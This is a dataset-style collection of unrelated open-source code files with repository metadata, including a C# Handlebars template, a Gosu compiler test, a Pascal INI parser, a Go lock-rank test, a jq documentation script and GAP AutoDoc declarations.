public {{DotNetType}}{{#if IsDotNetNullable}}?{{/if}} {{pascal NameAlias}} { get; set; }
{{#unless @last}}
{{else}}
{{#unless @../last}}
{{/unless}}
{{/unless}}
{{/each}}
{{/each}}
{{#each JoinCdcChildren}}
{{#ifeq JoinCardinality 'OneToMany'}}
/// <summary>
/// Gets or sets the related (one-to-many) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}Collection"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}CdcCollection? {{PropertyName}} { get; set; }
{{else}}
/// <summary>
/// Gets or sets the related (one-to-one) <see cref="{{Parent.ModelName}}Cdc.{{ModelName}}"/> (database table '{{Schema}}.{{TableName}}').
/// </summary>
[JsonProperty("{{camel PropertyName}}", DefaultValueHandling = {{#if SerializationEmitDefault}}DefaultValueHandling.Include{{else}}DefaultValueHandling.Ignore{{/if}})]
[MapperIgnore()]
public {{Parent.ModelName}}Cdc.{{ModelName}}Cdc? {{PropertyName}} { get; set; }
{{/ifeq}}
{{/each}}
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public bool HasUniqueKey => true;
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public UniqueKey UniqueKey => new UniqueKey({{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}{{pascal NameAlias}}{{/each}});
/// <summary>
/// <inheritdoc/>
/// </summary>
[MapperIgnore()]
public string[] UniqueKeyProperties => new string[] { {{#each PrimaryKeyColumns}}{{#unless @first}}, {{/unless}}nameof({{pascal NameAlias}}){{/each}} };
{{#each JoinHierarchyReverse}}
{{#unless @last}}
{{#each OnSelectColumns}}
/// <summary>
/// Gets or sets the '{{Parent.JoinTo}}_{{Name}}' additional joining column (informational); for internal join use only (not serialized).
/// </summary>
public {{ToDbColumn.DotNetType}} {{Parent.JoinTo}}_{{Name}} { get; set; }
{{/each}}
{{/unless}}
{{/each}}
}
/// <summary>
/// Represents the CDC model for the related (child) database table collection '{{Schema}}.{{Name}}'.
/// </summary>
public partial class {{ModelName}}CdcCollection : List<{{ModelName}}Cdc> { }
#endregion
{{/each}}
}
}
#pragma warning restore
#nullable restore | Harbour | 5 | ualehosaini/Beef | tools/Beef.CodeGen.Core/Templates/DbCdcEntity_cs.hb | [
"MIT"
] |
package gw.specContrib.classes.property_Declarations.gosuClassGosuEnh
uses java.lang.Integer
uses java.util.ArrayList
enhancement Errant_GosuEnh_62: Errant_GosuClass_62 {
//This should be error - IDE-1817
function setMyProperty1(a: ArrayList<Integer>) {} //## issuekeys: CONFLICT
//This should be error - IDE-1817
function setMyProperty2(a: ArrayList<Integer>) {} //## issuekeys: CONFLICT
function getMyProperty3() : ArrayList<Integer> {return null} //## issuekeys: THE METHOD 'GETMYPROPERTY3()' IS ALREADY DEFINED IN THE TYPE 'GW.SPECCONTRIB.AAA.PARSERVSOPENSOURCE.PROPERTIES.PREPARINGFORPUSH.GOSUCLASSGOSUENH.ERRANT_GOSUCLASS_62'. ENHANCEMENTS CANNOT OVERRIDE METHODS.
function getMyProperty4() : ArrayList<Integer> {return null} //## issuekeys: THE METHOD 'GETMYPROPERTY4()' IS ALREADY DEFINED IN THE TYPE 'GW.SPECCONTRIB.AAA.PARSERVSOPENSOURCE.PROPERTIES.PREPARINGFORPUSH.GOSUCLASSGOSUENH.ERRANT_GOSUCLASS_62'. ENHANCEMENTS CANNOT OVERRIDE METHODS.
}
| Gosu | 3 | tcmoore32/sheer-madness | gosu-test/src/test/gosu/gw/specContrib/classes/property_Declarations/gosuClassGosuEnh/Errant_GosuEnh_62.gsx | [
"Apache-2.0"
] |
{
Copyright 2014 Stas'M Corp.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
}
unit LiteINI;
interface
uses
SysUtils;
type
SList = Array of String;
INIValue = record
Name: String;
Value: String;
end;
INISection = record
Name: String;
Values: Array of INIValue;
end;
INIFile = Array of INISection;
procedure SListClear(var List: SList);
function SListAppend(var List: SList; S: String): Integer;
function SListFind(List: SList; Value: String): Integer;
function INIFindSection(INI: INIFile; Section: String): Integer;
function INIFindValue(INI: INIFile; Section: Integer; Value: String): Integer;
function INIAddSection(var INI: INIFile; Section: String): Integer;
function INIAddValue(var INI: INIFile; Section: Integer; ValueName, Value: String): Integer;
procedure INIUnload(var INI: INIFile);
procedure INILoad(var INI: INIFile; FileName: String);
function INISectionExists(INI: INIFile; Section: String): Boolean;
function INIValueExists(INI: INIFile; Section: String; Value: String): Boolean;
function INIReadSectionLowAPI(INI: INIFile; Section: Integer; var List: SList): Boolean;
function INIReadSection(INI: INIFile; Section: String): SList;
function INIReadStringLowAPI(INI: INIFile; Section, Value: Integer; var Str: String): Boolean;
function INIReadString(INI: INIFile; Section, Value, Default: String): String;
function INIReadInt(INI: INIFile; Section, Value: String; Default: Integer): Integer;
function INIReadDWord(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
function INIReadIntHex(INI: INIFile; Section, Value: String; Default: Integer): Integer;
function INIReadDWordHex(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
function INIReadBool(INI: INIFile; Section, Value: String; Default: Boolean): Boolean;
function INIReadBytes(INI: INIFile; Section, Value: String): TBytes;
function INIReadBytesDef(INI: INIFile; Section, Value: String; Default: TBytes): TBytes;
implementation
procedure SListClear(var List: SList);
begin
SetLength(List, 0);
end;
function SListAppend(var List: SList; S: String): Integer;
begin
SetLength(List, Length(List) + 1);
List[Length(List) - 1] := S;
Result := Length(List) - 1;
end;
function SListFind(List: SList; Value: String): Integer;
var
I: Integer;
begin
Result := -1;
for I := 0 to Length(List) - 1 do
if List[I] = Value then begin
Result := I;
Break;
end;
end;
function INIFindSection(INI: INIFile; Section: String): Integer;
var
I: Integer;
begin
Result := -1;
for I := 0 to Length(INI) - 1 do
if INI[I].Name = Section then begin
Result := I;
Exit;
end;
end;
function INIFindValue(INI: INIFile; Section: Integer; Value: String): Integer;
var
I: Integer;
begin
Result := -1;
if (Section < 0) or (Section >= Length(INI)) then
Exit;
for I := 0 to Length(INI[Section].Values) - 1 do
if INI[Section].Values[I].Name = Value then begin
Result := I;
Exit;
end;
end;
function INIAddSection(var INI: INIFile; Section: String): Integer;
begin
Result := INIFindSection(INI, Section);
if Result >= 0 then
Exit;
Result := Length(INI);
SetLength(INI, Result + 1);
INI[Result].Name := Section;
SetLength(INI[Result].Values, 0);
end;
// Stores ValueName=Value inside section number Section, overwriting an
// existing entry or appending a new one. Returns the value's index,
// or -1 when the section index is out of range.
function INIAddValue(var INI: INIFile; Section: Integer; ValueName, Value: String): Integer;
begin
  Result := -1;
  if (Section < 0) or (Section >= Length(INI)) then
    Exit;
  Result := INIFindValue(INI, Section, ValueName);
  if Result < 0 then
  begin
    // Not present yet: grow the array and record the name.
    Result := Length(INI[Section].Values);
    SetLength(INI[Section].Values, Result + 1);
    INI[Section].Values[Result].Name := ValueName;
  end;
  INI[Section].Values[Result].Value := Value;
end;
// Discards all parsed sections, leaving INI empty.
procedure INIUnload(var INI: INIFile);
begin
  INI := nil;
end;
// Parses the INI file at FileName into INI, replacing any previous content.
// A missing file simply leaves INI empty.
procedure INILoad(var INI: INIFile; FileName: String);
var
F: TextFile;
S, ValueName, Value: String;
INIList: SList;
I, Sect: Integer;
begin
INIUnload(INI);
if not FileExists(FileName) then
Exit;
AssignFile(F, FileName);
Reset(F);
// Read and filter lines
// Pass 1: keep only lines that are not comments (';' or '#' in column 1 of
// the raw, untrimmed line) and that look like either a "[section]" header
// or a "name=value" pair; everything else is dropped.
// NOTE(review): a comment line whose ';' is preceded by whitespace is NOT
// filtered here and may later be parsed as a value -- confirm intended.
while not EOF(F) do begin
Readln(F, S);
if (Pos(';', S) <> 1)
and (Pos('#', S) <> 1)
and (
((Pos('[', S) > 0) and (Pos(']', S) > 0)) or
(Pos('=', S) > 0)
)
then
SListAppend(INIList, S);
end;
CloseFile(F);
// Parse 2 (parse format)
// Pass 2: build the section/value structure. Values seen before any
// section header land in an implicit section with an empty name.
Sect := -1;
for I := 0 to Length(INIList) - 1 do begin
S := Trim(INIList[I]);
if Length(S) >= 2 then
if (S[1] = '[') and (S[Length(S)] = ']') then begin
// Section header: the name is the trimmed text between the brackets.
S := Trim(Copy(S, 2, Length(S) - 2));
Sect := INIAddSection(INI, S);
Continue;
end;
// Not a header: split the raw (untrimmed) line at the first '='.
// The name is trimmed; the value keeps its surrounding whitespace.
S := INIList[I];
if Pos('=', S) > 0 then begin
ValueName := Trim(Copy(S, 1, Pos('=', S) - 1));
Value := Copy(S, Pos('=', S) + 1, Length(S) - Pos('=', S));
if Sect = -1 then
Sect := INIAddSection(INI, '');
INIAddValue(INI, Sect, ValueName, Value);
end;
end;
end;
// Whether a section named Section exists in INI.
function INISectionExists(INI: INIFile; Section: String): Boolean;
begin
  Result := INIFindSection(INI, Section) >= 0;
end;
// Whether section Section contains a value named Value.
function INIValueExists(INI: INIFile; Section: String; Value: String): Boolean;
begin
  // INIFindValue tolerates -1 from a failed section lookup.
  Result := INIFindValue(INI, INIFindSection(INI, Section), Value) >= 0;
end;
// Copies the value names of section number Section into List.
// Returns False (with List emptied) when the index is out of range.
function INIReadSectionLowAPI(INI: INIFile; Section: Integer; var List: SList): Boolean;
var
  Idx: Integer;
begin
  List := nil;
  Result := (Section >= 0) and (Section < Length(INI));
  if not Result then
    Exit;
  for Idx := 0 to Length(INI[Section].Values) - 1 do
    SListAppend(List, INI[Section].Values[Idx].Name);
end;
// Returns the value names of the named section (empty list when absent).
function INIReadSection(INI: INIFile; Section: String): SList;
begin
  INIReadSectionLowAPI(INI, INIFindSection(INI, Section), Result);
end;
// Fetches the raw string of value number Value in section number Section.
// Returns False (leaving Str untouched) when either index is out of range.
function INIReadStringLowAPI(INI: INIFile; Section, Value: Integer; var Str: String): Boolean;
begin
  Result := False;
  if (Section < 0) or (Section >= Length(INI)) then
    Exit;
  if (Value >= 0) and (Value < Length(INI[Section].Values)) then
  begin
    Str := INI[Section].Values[Value].Value;
    Result := True;
  end;
end;
// Reads the named value as a raw string, returning Default when absent.
function INIReadString(INI: INIFile; Section, Value, Default: String): String;
var
  Sect: Integer;
begin
  Sect := INIFindSection(INI, Section);
  if not INIReadStringLowAPI(INI, Sect, INIFindValue(INI, Sect, Value), Result) then
    Result := Default;
end;
// Reads the named value as a signed decimal integer; Default on parse failure.
function INIReadInt(INI: INIFile; Section, Value: String; Default: Integer): Integer;
var
  Err: Integer;
begin
  Val(INIReadString(INI, Section, Value, ''), Result, Err);
  if Err <> 0 then
    Result := Default;
end;
// Reads the named value as an unsigned decimal integer; Default on parse failure.
function INIReadDWord(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
var
  Err: Integer;
begin
  Val(INIReadString(INI, Section, Value, ''), Result, Err);
  if Err <> 0 then
    Result := Default;
end;
// Reads the named value as a hexadecimal signed integer. The stored text
// carries no prefix; '$' is prepended before parsing. Default on failure.
function INIReadIntHex(INI: INIFile; Section, Value: String; Default: Integer): Integer;
var
  Err: Integer;
begin
  Val('$' + INIReadString(INI, Section, Value, ''), Result, Err);
  if Err <> 0 then
    Result := Default;
end;
// Reads the named value as a hexadecimal unsigned integer. The stored text
// carries no prefix; '$' is prepended before parsing. Default on failure.
function INIReadDWordHex(INI: INIFile; Section, Value: String; Default: Cardinal): Cardinal;
var
  Err: Integer;
begin
  Val('$' + INIReadString(INI, Section, Value, ''), Result, Err);
  if Err <> 0 then
    Result := Default;
end;
// Reads the named value as a boolean: any unsigned number greater than
// zero is True, zero is False, anything unparsable yields Default.
function INIReadBool(INI: INIFile; Section, Value: String; Default: Boolean): Boolean;
var
  Num: Cardinal;
  Err: Integer;
begin
  Val(INIReadString(INI, Section, Value, ''), Num, Err);
  if Err = 0 then
    Result := Num > 0
  else
    Result := Default;
end;
// Decodes a hex string (two digits per byte, case-insensitive) into B.
// Returns False when the length is odd or a non-hex character is found
// (B may then hold partial data); an empty string yields an empty array.
function StringToBytes(S: String; var B: TBytes): Boolean;

  // Returns the numeric value (0..15) of hex digit C, or -1 when C is
  // not a hex digit. Replaces the two 16-way case tables the original
  // duplicated for the high and low nibbles.
  function HexVal(C: Char): Integer;
  begin
    case C of
      '0'..'9': Result := Ord(C) - Ord('0');
      'A'..'F': Result := Ord(C) - Ord('A') + 10;
      'a'..'f': Result := Ord(C) - Ord('a') + 10;
    else
      Result := -1;
    end;
  end;

var
  I, Hi, Lo: Integer;
begin
  Result := False;
  if Odd(Length(S)) then
    Exit;
  SetLength(B, Length(S) div 2);
  for I := 0 to Length(B) - 1 do
  begin
    // S is 1-based: byte I comes from chars 2*I+1 (high) and 2*I+2 (low).
    Hi := HexVal(S[(I * 2) + 1]);
    Lo := HexVal(S[(I * 2) + 2]);
    if (Hi < 0) or (Lo < 0) then
      Exit;
    B[I] := (Hi shl 4) or Lo;
  end;
  Result := True;
end;
// Reads the named value as hex-encoded bytes; an empty array on failure.
function INIReadBytes(INI: INIFile; Section, Value: String): TBytes;
begin
  if not StringToBytes(INIReadString(INI, Section, Value, ''), Result) then
    SetLength(Result, 0);
end;
// Reads the named value as hex-encoded bytes; Default on failure.
function INIReadBytesDef(INI: INIFile; Section, Value: String; Default: TBytes): TBytes;
begin
  if not StringToBytes(INIReadString(INI, Section, Value, ''), Result) then
    Result := Default;
end;
end.
| Pascal | 3 | ahmedsweed/rdpwrap | src-x86-binarymaster/LiteINI.pas | [
"Apache-2.0"
] |
CREATE TABLE "public"."table24"("name" text NOT NULL, "id" serial NOT NULL, PRIMARY KEY ("id") );
| SQL | 4 | devrsi0n/graphql-engine | cli/commands/testdata/migrate-squash-test/migrations/1588172669359_create_table_public_table24/up.sql | [
"Apache-2.0",
"MIT"
] |
' stripdir.bmx
print stripdir("mypath/myfile.bmx") 'prints myfile.bmx
| BlitzMax | 3 | jabdoa2/blitzmax | mod/brl.mod/filesystem.mod/doc/stripdir.bmx | [
"Zlib"
] |
%hr/
BBB
%hr/
| Scaml | 0 | mohno007/skinny-framework | example/src/main/webapp/WEB-INF/views/custom-layout/bar.html.scaml | [
"MIT"
] |
Red [
Title: "GUI event flows testing script"
Author: "Nenad Rakocevic"
File: %events-flow.red
Needs: 'View
]
system/view/capturing?: yes
view/options [
panel 200x200 blue [
panel 150x150 green [
base 50x50 red
on-detect [if event/type = 'down [print "4"]]
on-down [print "5"]
]
on-detect [if event/type = 'down [print "3"]]
on-down [print "6"]
]
on-detect [if event/type = 'down [print "2"]]
on-down [print "7"]
][
actors: object [
on-detect: func [f e][if e/type = 'down [print "----^/1"]]
on-down: func [f e][print "8"]
]
]
system/view/capturing?: no | Red | 4 | 0xflotus/red | tests/events-flow.red | [
"BSL-1.0",
"BSD-3-Clause"
] |
// Copyright 2021 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package runtime_test
import (
. "runtime"
"testing"
)
// Check that the partial order in lockPartialOrder fits within the total order
// determined by the order of the lockRank constants.
func TestLockRankPartialOrder(t *testing.T) {
	for r, list := range LockPartialOrder {
		rank := LockRank(r)
		// Every rank listed as acquirable-before must not exceed this row's
		// rank, otherwise the partial order contradicts the total ordering
		// the constants define.
		for _, e := range list {
			entry := LockRank(e)
			if entry > rank {
				t.Errorf("lockPartialOrder row %v entry %v is inconsistent with total lock ranking order", rank, entry)
			}
		}
	}
}
// Verify that partial order lists are kept sorted. This is a purely cosmetic
// check to make manual reviews simpler. It does not affect correctness, unlike
// the above test.
func TestLockRankPartialOrderSortedEntries(t *testing.T) {
	for r, list := range LockPartialOrder {
		rank := LockRank(r)
		var prev LockRank
		for _, e := range list {
			entry := LockRank(e)
			// Entries must be strictly increasing; this also flags duplicates.
			if entry <= prev {
				t.Errorf("Partial order for rank %v out of order: %v <= %v in %v", rank, entry, prev, list)
			}
			prev = entry
		}
	}
}
| Go | 5 | SSSDNSY/go | src/runtime/lockrank_test.go | [
"BSD-3-Clause"
] |
#!/usr/bin/env fq -rnf
def code: "`\(.)`";
def nbsp: gsub(" "; " ");
def has_section($f; $fhelp): $fhelp.notes or $fhelp.examples or $fhelp.links or $f.decode_in_arg;
def formats_list:
[ formats
| to_entries[] as {$key, $value}
| (_format_func($key; "_help")? // {}) as $fhelp
| if has_section($value; $fhelp) then "[\($key)](doc/formats.md#\($key))"
else $key
end
] | join(",\n");
def formats_table:
( [ {
name: "Name",
desc: "Description",
uses: "Dependencies"
},
{
name: "-",
desc: "-",
uses: "-"
},
( formats
| to_entries[]
| (_format_func(.key; "_help")? // {}) as $fhelp
| {
name:
( ( .key as $format
| if has_section(.value; $fhelp) then "[\($format | code)](#\($format))"
else $format | code
end
)
+ " "
),
desc: (.value.description | nbsp),
uses: "<sub>\((((.value.dependencies | flatten | map(code)) | join(" "))? // ""))</sub>"
}
),
( [ formats
| to_entries[]
| . as $e
| select(.value.groups)
| .value.groups[] | {key: ., value: $e.key}
]
| reduce .[] as $e ({}; .[$e.key] += [$e.value])
| to_entries[]
| {
name: ((.key | code) + " "),
desc: "Group",
uses: "<sub>\(((.value | map(code)) | join(" ")))</sub>"
}
)
]
| table(
[ .name
, .desc
, .uses
];
[ ""
, (.[0] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, (.[1] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, .[2].string
, ""
] | join("|")
)
);
def formats_sections:
( formats[] as $f
| (_format_func($f.name; "_help")? // {} | _help_format_enrich("fq"; $f; false)) as $fhelp
| select(has_section($f; $fhelp))
| "### \($f.name)"
, ""
, ($fhelp.notes | if . then ., "" else empty end)
, if $f.decode_in_arg then
( "#### Options"
, ""
, ( [ { name: "Name"
, default: "Default"
, desc: "Description"
}
, { name: "-"
, default: "-"
, desc: "-"
}
, ( $f.decode_in_arg
| to_entries[] as {$key,$value}
| { name: ($key | code)
, default: ($value | tostring)
, desc: $f.decode_in_arg_doc[$key]
}
)
]
| table(
[ .name
, .default
, .desc
];
[ ""
, (.[0] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, (.[1] | . as $rc | $rc.string | rpad(" "; $rc.maxwidth))
, .[2].string
, ""
] | join("|")
)
)
, ""
)
else empty
end
, if $fhelp.examples then
( "#### Examples"
, ""
, ( $fhelp.examples[]
| "\(.comment)"
, if .shell then
( "```"
, "$ \(.shell)"
, "```"
)
elif .expr then
( "```"
, "... | \(.expr)"
, "```"
)
else empty
end
, ""
)
)
else empty
end
, if $fhelp.links then
( "#### References and links"
, ""
, ( $fhelp.links[]
| if .title then "- [\(.title)](\(.url))"
else "- \(.url)"
end
)
, ""
)
else empty
end
);
| JSONiq | 3 | bbhunter/fq | doc/formats.jq | [
"MIT"
] |
#############################################################################
##
## Magic.gd AutoDoc package
##
## Copyright 2013, Max Horn, JLU Giessen
## Sebastian Gutsche, University of Kaiserslautern
##
#############################################################################
#! @Description
#! This is the main function of the &AutoDoc; package. It can perform
#! any combination of the following three tasks:
#! <Enum>
#! <Item>
#! It can (re)generate a scaffold for your package manual.
#! That is, it can produce two XML files in &GAPDoc; format to be used as part
#! of your manual: First, a file named <F>doc/PACKAGENAME.xml</F>
#! (with your package's name substituted) which is used as
#! main file for the package manual, i.e. this file sets the
#! XML DOCTYPE and defines various XML entities, includes
#! other XML files (both those generated by &AutoDoc; as well
#! as additional files created by other means), tells &GAPDoc;
#! to generate a table of content and an index, and more.
#! Secondly, it creates a file <F>doc/title.xml</F> containing a title
#! page for your documentation, with information about your package
#! (name, description, version), its authors and more, based
#! on the data in your <F>PackageInfo.g</F>.
#! </Item>
#! <Item>
#! It can scan your package for &AutoDoc; based documentation (by using &AutoDoc;
#! tags and the Autodoc command.
#! This will
#! produce further XML files to be used as part of the package manual.
#! </Item>
#! <Item>
#! It can use &GAPDoc; to generate PDF, text and HTML (with
#! MathJaX enabled) documentation from the &GAPDoc; XML files it
#! generated as well as additional such files provided by you. For
#! this, it invokes <Ref Func='MakeGAPDocDoc' BookName='gapdoc'/>
#! to convert the XML sources, and it also instructs &GAPDoc; to copy
#! supplementary files (such as CSS style files) into your doc directory
#! (see <Ref Func='CopyHTMLStyleFiles' BookName='gapdoc'/>).
#! </Item>
#! </Enum>
#! For more information and some examples, please refer to Chapter <Ref Label='Tutorials'/>.
#! <P/>
#! The parameters have the following meanings:
#! <List>
#!
#! <Mark><A>package_name</A></Mark>
#! <Item>
#! The name of the package whose documentation should be(re)generated.
#! </Item>
#!
#!
#! <Mark><A>option_record</A></Mark>
#! <Item>
#! <A>option_record</A> can be a record with some additional options.
#! The following are currently supported:
#! <List>
#! <Mark><A>dir</A></Mark>
#! <Item>
#! This should be a string containing a (relative) path or a
#! Directory() object specifying where the package documentation
#! (i.e. the &GAPDoc; XML files) are stored.
#! <Br/>
#! <E>Default value: <C>"doc/"</C>.</E>
#! </Item>
#! <Mark><A>scaffold</A></Mark>
#! <Item>
#! This controls whether and how to generate scaffold XML files
#! for the main and title page of the package's documentation.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.scaffold</A> is missing but the
#! package's info record in <F>PackageInfo.g</F> has an <C>AutoDoc</C> entry.
#! In all other cases (in particular if <A>opt.scaffold</A> is
#! <K>false</K>), scaffolding is disabled.
#! <P/>
#!
#! If <A>opt.scaffold</A> is a record, it may contain the following entries.
#!
#### TODO: mention merging with PackageInfo.AutoDoc!
#! <List>
#!
#! <Mark><A>includes</A></Mark>
#! <Item>
#! A list of XML files to be included in the body of the main XML file.
#! If you specify this list and also are using &AutoDoc; to document
#! your operations with &AutoDoc; comments,
#! you can add <F>AutoDocMainFile.xml</F> to this list
#! to control at which point the documentation produced by &AutoDoc;
#! is inserted. If you do not do this, it will be added after the last
#! of your own XML files.
#! </Item>
#!
#! <Mark><A>appendix</A></Mark>
#! <Item>
#! This entry is similar to <A>opt.scaffold.includes</A> but is used
#! to specify files to include after the main body of the manual,
#! i.e. typically appendices.
#! </Item>
#!
#! <Mark><A>bib</A></Mark>
#! <Item>
#! The name of a bibliography file, in Bibtex or XML format.
#! If this key is not set, but there is a file <F>doc/PACKAGENAME.bib</F>
#! then it is assumed that you want to use this as your bibliography.
#! </Item>
#!
#### TODO: The 'entities' param is a bit strange. We should probably change it to be a bit more
#### general, as one might want to define other entities... For now, we do not document it
#### to leave us the choice of revising how it works.
####
#### <Mark><A>entities</A></Mark>
#### <Item>
#### A list of package names or other entities which are used to define corresponding XML entities.
#### For example, if set to a list containing the string <Q>SomePackage</Q>,
#### then the following is added to the XML preamble:
#### <Listing><![CDATA[<!ENTITY SomePackage '<Package>SomePackage</Package>'>]]></Listing>
#### This allows you to write <Q>&SomePackage;</Q> in your documentation
#### to reference that package. If another type of entity is desired, one can simply add,
#### instead of a string, add a two entry list <A>a</A> to the list. It will be handled as
#### <Listing><![CDATA[<!ENTITY a[ 2 ] '<a[ 1 ]>a[ 2 ]</a[ 1 ]>'>]]></Listing>,
#### so please be careful.
#### </Item>
#!
#! <Mark><A>TitlePage</A></Mark>
#! <Item>
#! A record whose entries are used to embellish the generated titlepage
#! for the package manual with extra information, such as a copyright
#! statement or acknowledgments. To this end, the names of the record
#! components are used as XML element names, and the values of the
#! components are outputted as content of these XML elements. For
#! example, you could pass the following record to set a custom
#! acknowledgements text:
#! <Listing><![CDATA[
#! rec( Acknowledgements := "Many thanks to ..." )]]></Listing>
#! For a list of valid entries in the titlepage, please refer to the
#! &GAPDoc; manual, specifically section <Ref Subsect='Title' BookName='gapdoc'/>
#! and following.
#! </Item>
#! <Mark><A>document_class</A></Mark>
#! <Item>
#! Sets the document class of the resulting pdf. The value can either be a string
#! which has to be the name of the new document class, a list containing this string, or
#! a list of two strings. Then the first one has to be the document class name, the second one
#! the option string ( contained in [ ] ) in LaTeX.
#! </Item>
#! <Mark><A>latex_header_file</A></Mark>
#! <Item>
#! Replaces the standard header from &GAPDoc; completely with the header in this LaTeX file.
#! Please be careful here, and look at GAPDoc's latexheader.tex file for an example.
#! </Item>
#! <Mark><A>gapdoc_latex_options</A></Mark>
#! <Item>
#! Must be a record with entries which can be understood by SetGapDocLaTeXOptions. Each entry can be a string, which
#! will be given to &GAPDoc; directly, or a list containing of two entries: The first one must be the string "file",
#! the second one a filename. This file will be read and then its content is passed to &GAPDoc; as option with the name
#! of the entry.
#! </Item>
#!
#! </List>
#! </Item>
#!
#!
#! <Mark><A>autodoc</A></Mark>
#! <Item>
#! This controls whether and how to generate addition XML documentation files
#! by scanning for &AutoDoc; documentation comments.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.autodoc</A> is missing but the
#! package depends (directly) on the &AutoDoc; package.
#! In all other cases (in particular if <A>opt.autodoc</A> is
#! <K>false</K>), this feature is disabled.
#! <P/>
#!
#! If <A>opt.autodoc</A> is a record, it may contain the following entries.
#!
#! <List>
#!
#! <Mark><A>files</A></Mark>
#! <Item>
#! A list of files (given by paths relative to the package directory)
#! to be scanned for &AutoDoc; documentation comments.
#! Usually it is more convenient to use <A>autodoc.scan_dirs</A>, see below.
#! </Item>
#!
#! <Mark><A>scan_dirs</A></Mark>
#! <Item>
#! A list of subdirectories of the package directory (given as relative paths)
#! which &AutoDoc; then scans for .gi, .gd and .g files; all of these files
#! are then scanned for &AutoDoc; documentation comments.
#! <Br/>
#! <E>Default value: <C>[ "gap", "lib", "examples", "examples/doc" ]</C>.</E>
#! </Item>
#!
#! <Mark><A>level</A></Mark>
#! <Item>
#! This defines the level of the created documentation. The default value is 0.
#! When parts of the manual are declared with a higher value
#! they will not be printed into the manual.
#! </Item>
#!
#### TODO: Document section_intros later on.
#### However, note that thanks to the new AutoDoc comment syntax, the only remaining
#### use for this seems to be the ability to specify the order of chapters and
#### sections.
#### <Mark><A>section_intros</A></Mark>
#### <Item>
#### TODO.
#### </Item>
#!
#! </List>
#! </Item>
#!
#!
#! <Mark><A>gapdoc</A></Mark>
#! <Item>
#! This controls whether and how to invoke &GAPDoc; to create HTML, PDF and text
#! files from your various XML files.
#! <P/>
#! The value should be either <K>true</K>, <K>false</K> or a
#! record. If it is a record or <K>true</K> (the latter is
#! equivalent to specifying an empty record), then this feature is
#! enabled. It is also enabled if <A>opt.gapdoc</A> is missing.
#! In all other cases (in particular if <A>opt.gapdoc</A> is
#! <K>false</K>), this feature is disabled.
#! <P/>
#!
#! If <A>opt.gapdoc</A> is a record, it may contain the following entries.
#!
#! <List>
#!
#!
#### Note: 'main' is strictly speaking also used for the scaffold.
#### However, if one uses the scaffolding mechanism, then it is not
#### really necessary to specify a custom name for the main XML file.
#### Thus, the purpose of this parameter is to cater for packages
#### that have existing documentation using a different XML name,
#### and which do not wish to use scaffolding.
####
#### This explain why we only allow specifying gapdoc.main.
#### The scaffolding code will still honor it, though, just in case.
#! <Mark><A>main</A></Mark>
#! <Item>
#! The name of the main XML file of the package manual.
#! This exists primarily to support packages with existing manual
#! which use a filename here which differs from the default.
#! In particular, specifying this is unnecessary when using scaffolding.
#! <Br/>
#! <E>Default value: <C>PACKAGENAME.xml</C></E>.
#! </Item>
#!
#! <Mark><A>files</A></Mark>
#! <Item>
#! A list of files (given by paths relative to the package directory)
#! to be scanned for &GAPDoc; documentation comments.
#! Usually it is more convenient to use <A>gapdoc.scan_dirs</A>, see below.
#! </Item>
#!
#! <Mark><A>scan_dirs</A></Mark>
#! <Item>
#! A list of subdirectories of the package directory (given as relative paths)
#! which &AutoDoc; then scans for .gi, .gd and .g files; all of these files
#! are then scanned for &GAPDoc; documentation comments.
#! <Br/>
#! <E>Default value: <C>[ "gap", "lib", "examples", "examples/doc" ]</C>.</E>
#! </Item>
#!
#! </List>
#! </Item>
## This is the maketest part. Still under construction.
#! <Mark><A>maketest</A></Mark>
#! <Item>
#! The maketest item can be true or a record. When it is true,
#! a simple maketest.g is created in the main package directory,
#! which can be used to test the examples from the manual. As a record,
#! the entry can have the following entries itself, to specify some options.
#! <List>
#! <Mark>filename</Mark>
#! <Item>
#! Sets the name of the test file.
#! </Item>
#! <Mark>commands</Mark>
#! <Item>
#! A list of strings, each one a command, which
#! will be executed at the beginning of the test file.
#! </Item>
#! </List>
#! </Item>
#!
#! </List>
#! </Item>
#! </List>
#!
#! @Returns nothing
#! @Arguments package_name[, option_record ]
#! @ChapterInfo AutoDoc, The AutoDoc() function
DeclareGlobalFunction( "AutoDoc" );
| GDScript | 5 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/GAP/Magic.gd | [
"MIT"
] |
@[if DEVELSPACE]@
# Env variables in develspace.
export ROVIO_CONFIG_DIR="@(CMAKE_CURRENT_SOURCE_DIR)/share/"
@[else]@
# Env variables in installspace.
export ROVIO_CONFIG_DIR="$CATKIN_ENV_HOOK_WORKSPACE/share/"
@[end if]@ | EmberScript | 3 | AdronTech/maplab | applications/rovioli/env-hooks/10.rovio-config-template.sh.em | [
"Apache-2.0"
] |
#!/bin/bash
# change the following for install path, note
# that VER is appended to the path.
VER="trunk"
SW_INSTALL_ROOT=/tmp/work/gshipman/ompi/install
PLATFORM=ornl/cray_xt_cnl_romio
